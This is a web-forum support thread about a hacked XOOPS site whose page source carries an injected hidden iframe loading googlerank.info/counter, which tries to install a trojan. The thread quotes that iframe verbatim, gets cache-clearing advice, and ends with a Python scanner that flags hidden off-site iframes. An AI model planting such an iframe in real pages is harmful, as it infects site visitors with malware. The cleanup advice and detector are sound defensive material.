1
deano42
googlerank.info hack - help!
  • 2007/6/5 7:55

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


It appears as if my XOOPS site has been hacked; an iframe pointing to http://googlerank.info/counter has appeared in the coding on the main page which then tries to download something nasty.

I'm not sure where to look to remove it though. I extracted the MySQL database and couldn't find it in any of the tables, and did a search for it in all the php, htm, html, css files of the site too.

Although not visible to a site user, its coding appears underneath the menu on the left of the site, just before the random xoopsgallery image.

</table><div class="blockContent"><table cellspacing="0">
  <tr>
    <td id="mainmenu">
      <a class="menuTop" href="http://www.blmra.co.uk/">Home</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/wfchannel/">About Lawn Mower Racing</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/news/">Latest News</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/googlemaps/">Events</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/turismo/">12 Hour</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsfaq/">FAQ</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/page/">Race Results</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/wmpdownloads/">Downloads</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/osC/">Online Purchasing</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/xoopsgallery/">Gallery</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/association/">Video</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/userpage/">Racers Profiles</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/newbb/">Check Race Entry</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/catads/">Classifieds</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/myalbum/">Users Photos</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/mylinks/">Links</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/services/">Contact Us</a>
      <a class="menuMain" href="http://www.blmra.co.uk/modules/dms/">Document Management System</a>
    </td>
  </tr>
</table></div></td>
  </tr>
</table>

  <table cellspacing="0">
  <tr>
    <td class="obBlock" ><table cellspacing="0">
  <tr>
    <td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhl.gif" width="4" height="20" alt="" /></td>
    <td class="blockTitle" >Random Picture</td>
    <td width="4"><img src="http://www.blmra.co.uk/themes/blmrav6//images/lhr.gif" width="4" height="20" alt="" /></td>
  </tr>
</table><div class="blockContent"><iframe src=http://googlerank.info/counter width=1 height=1 style=display:none>
<div>  <div style="width: 100%;">
  <div class="item" style="padding: 2px; margin: 2px;">
    <div style="text-align: center; width: 100%; ">
        <a href="http://www.blmra.co.uk/modules/xoopsgallery/view_photo.php?xoops_imageid=4332&set_albumName=album18&id=IMG_0167"><img src="http://www.blmra.co.uk/modules/xoopsgallery/cache/albums/album18/IMG_0167.thumb.jpg" width="150" height="100" alt="" /></a><br />
    </div>
    <div style="text-align: center; width: 100%; ">
    </div>
  </div>
  </div>
<div style="clear:both;"></div></div>
</div></td>
  </tr>
</table>


Anyone have any ideas where I should look to remove this?

The site is http://www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it tries to install a trojan.

Thanks

Deano

2
stefan88
Re: googlerank.info hack - help!
  • 2007/6/5 8:06

  • stefan88

  • Community Support Member

  • Posts: 1086

  • Since: 2004/9/20


Hi,

Check the template cache folder (templates_c). Delete the files there.
..

3
deano42
Re: googlerank.info hack - help!
  • 2007/6/5 8:17

  • deano42

  • Just popping in

  • Posts: 13

  • Since: 2006/4/26


That did it! Is there any way I can stop this from happening again?

I have installed XOOPS protector since this occurred.

Thanks Stefan,

Dean

4
BDW
Re: googlerank.info hack - help!
  • 2007/6/6 9:57

  • BDW

  • Quite a regular

  • Posts: 280

  • Since: 2002/9/28


Quote:

deano42 wrote:

The site is http://www.blmra.co.uk, my virus scanner catches it every time. Although look at your own risk, it tries to install a trojan.


BTW, just a wee warning, if you knew there was a Trojan on your website you should have closed it to the public.

How many people's computers has it infected that visited your site? They can sue you if they find out you knew about it.

5
stefan88
Re: googlerank.info hack - help!
  • 2007/6/6 10:23

  • stefan88

  • Community Support Member

  • Posts: 1086

  • Since: 2004/9/20


Hi deano42,

One thing I forgot: you should not delete the index.html file. It is available in other folders, so please delete the files in the "templates_c" folder again and copy index.html from one of the other folders to the "templates_c" folder!

It is a simple text file called index.html with this text:

<script>history.go(-1);</script>


Sorry about that mistake!

Probably the problem is with your hosting company and not with XOOPS, so there is not much you can do. Maybe creating an .htaccess in the templates_c folder may help, but I'm not very familiar with Apache ...
..
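
A check that can be run over templates_c before and after clearing it, as an added example that is not part of the original thread: it walks a cache directory and reports iframes that are both hidden (1x1 or display:none) and loaded from a host other than the site's own. The function names, the own-host set and the benign sample line are assumptions made for illustration; the injected line is the one quoted in the first post.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# Attribute values may be double-quoted, single-quoted or bare (as in the injected tag).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

OWN_HOSTS = {"www.blmra.co.uk", "blmra.co.uk"}  # assumption: hosts the site itself serves

# Constructed sample: first line is the injected tag from the post, second is a benign embed.
SAMPLE = (
    '<div class="blockContent"><iframe src=http://googlerank.info/counter '
    'width=1 height=1 style=display:none>\n'
    '<iframe src="http://maps.example.com/embed" width="400" height="300"></iframe>\n'
)

def iframe_attrs(tag_body):
    """Return the tag's attributes as a lowercase-keyed dict."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR_RE.finditer(tag_body)}

def is_hidden(attrs):
    """True for 0/1-pixel frames or frames hidden through inline CSS."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = attrs.get("width") in ("0", "1") and attrs.get("height") in ("0", "1")
    return tiny or "display:none" in style or "visibility:hidden" in style

def find_hidden_iframes(text, own_hosts=OWN_HOSTS):
    """List (host, tag) for hidden iframes whose src points off-site."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = iframe_attrs(m.group(1))
        host = (urlparse(attrs.get("src", "")).hostname or "").lower()
        if host and host not in own_hosts and is_hidden(attrs):
            hits.append((host, m.group(0)))
    return hits

def scan_cache(cache_dir, own_hosts=OWN_HOSTS):
    """Map each file under cache_dir that contains a hit to its list of hits."""
    report = {}
    for path in sorted(Path(cache_dir).rglob("*")):
        if path.is_file():
            hits = find_hidden_iframes(path.read_text(errors="replace"), own_hosts)
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for host, tag in find_hidden_iframes(SAMPLE):
        print(f"hidden off-site iframe -> {host}: {tag}")
```

A hit in a compiled template that is absent from the theme and module template sources means the cache file itself was modified, so the file's modification time is worth recording before the cache is deleted.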
